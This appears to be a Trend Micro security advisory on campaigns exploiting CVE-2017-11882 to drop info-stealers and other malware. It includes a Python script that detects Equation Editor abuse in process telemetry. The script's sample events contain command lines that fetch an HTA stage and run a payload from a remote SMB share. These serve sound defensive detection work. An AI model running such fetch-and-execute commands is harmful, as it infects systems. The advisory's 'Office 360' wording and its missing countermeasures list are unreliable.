Trend Micro uncovered a malicious Rich Text Format (RTF) file exploiting CVE-2017-11882 to deliver the spyware Loki (TSPY_LOKI). The payload is dropped via an HTML Application (HTA) that invokes PowerShell, which then retrieves the information stealer.
What does CVE-2017-11882 entail?
CVE-2017-11882 is a 17-year-old memory corruption issue in Microsoft Office (including Office 360). When exploited successfully, it can let attackers execute remote code on a vulnerable machine—even without user interaction—once a malicious document is opened. The flaw resides within Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that inserts or edits Object Linking and Embedding (OLE) objects in documents. A proof-of-concept exploit was released publicly, but the flaw has been fixed by Microsoft’s November Patch Tuesday.
The Loki family can steal account information from File Transfer Protocol (FTP) clients, as well as credentials stored on various web browsers and cryptocurrency wallets. Loki can also harvest data from “Sticky”-related (i.e., Sticky Notes) and online Poker game applications.
Trend Micro’s initial and ongoing analysis also found that a spammer group is actively exploiting CVE-2017-11882 to infect systems with the information stealers Pony/FAREIT and FormBook. The attack chain involves the use of a command that retrieves the payloads from a remote Server Message Block (SMB) open directory.
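The attack chains described above (Equation Editor spawning a child process, an HTA stage launching PowerShell, and payloads fetched from a remote SMB share) leave a recognisable trail in process-creation telemetry. The following detection logic is an added example, not Trend Micro's code; it assumes process-creation events (such as Sysmon Event ID 1 or EDR output) have already been normalised into dictionaries with `parent_image`, `image` and `command_line` keys, and the sample events it runs over are constructed for illustration.

```python
"""Flag process-creation events characteristic of CVE-2017-11882 abuse.

Added example (not Trend Micro's code). Assumes events are dicts with
'parent_image', 'image' and 'command_line' keys; sample events are constructed.
"""
import re
from dataclasses import dataclass

# Equation Editor, the vulnerable component named in the advisory.
EQUATION_EDITOR = "eqnedt32.exe"
# Script hosts seen in the described chain (HTA -> PowerShell) plus shells.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# A UNC path (\\host\share) in a command line: payload retrieved over SMB.
UNC_RE = re.compile(r"\\\\[\w.-]+\\[\w$.-]+")


@dataclass
class Finding:
    rule: str
    event: dict


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rules_for(event: dict) -> list:
    """Return the names of all detection rules that match one event."""
    parent = _basename(event.get("parent_image", ""))
    child = _basename(event.get("image", ""))
    cmdline = event.get("command_line", "")
    hits = []
    # Rule 1: Equation Editor never needs to spawn child processes in normal use.
    if parent == EQUATION_EDITOR:
        hits.append("eqnedt32_child_process")
    # Rule 2: the HTA stage handing off to PowerShell.
    if parent == "mshta.exe" and child == "powershell.exe":
        hits.append("mshta_spawns_powershell")
    # Rule 3: a script host or shell referencing a remote SMB path.
    if child in SCRIPT_HOSTS and UNC_RE.search(cmdline):
        hits.append("script_host_unc_path")
    return hits


def analyze(events) -> list:
    """Run every rule over every event and collect the findings in order."""
    return [Finding(rule, ev) for ev in events for rule in rules_for(ev)]


# Constructed sample telemetry (hostnames/IPs are documentation values).
SAMPLE_EVENTS = [
    {  # Word launching Equation Editor is normal and must not alert.
        "parent_image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
        "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        "command_line": '"EQNEDT32.EXE" -Embedding',
    },
    {  # Equation Editor spawning an HTA host: rule 1.
        "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta.exe http://example.invalid/stage.hta",
    },
    {  # HTA host launching PowerShell: rule 2.
        "parent_image": r"C:\Windows\System32\mshta.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe [arguments omitted]",
    },
    {  # Equation Editor running a shell that pulls from an SMB share: rules 1 and 3.
        "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"cmd.exe /c \\203.0.113.5\share\payload.exe",
    },
    {  # An administrator's interactive PowerShell session: benign.
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1",
    },
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"{finding.rule}: {finding.event['command_line']}")
```

Rule 1 is the high-signal one: Equation Editor has no legitimate reason to create child processes, so any such event deserves a look regardless of what the child is. Rules 2 and 3 are noisier on their own and are best correlated with rule 1 or with the opening of an RTF attachment shortly beforehand.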
The Cobalt hacking group also weaponized this security flaw in one of their campaigns in late November, sending out a similarly constructed RTF file. The final payload is a dynamic-link library (DLL) file. In their previous spear-phishing campaigns, the DLL was a component of the penetration testing tool Cobalt Strike, which they abuse to hijack the infected system.
Trend Micro also saw other threat actors using CVE-2017-11882 to infect systems with a keylogger and a lockscreen with a ransom note that resembles that of Bad Rabbit. Spam runs were also seen in Australia and Japan on November 21, which dropped ZLoader—a downloader Trojan for ZBOT—and Ursnif, respectively.
Screenshots of the sample emails in the spam runs in Australia (left) and Japan (right)
What can users and businesses do?
Here are some of the countermeasures that can be used against threats that use CVE-2017-11882:
These solutions are powered by Trend Micro XGen™ security, which provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads.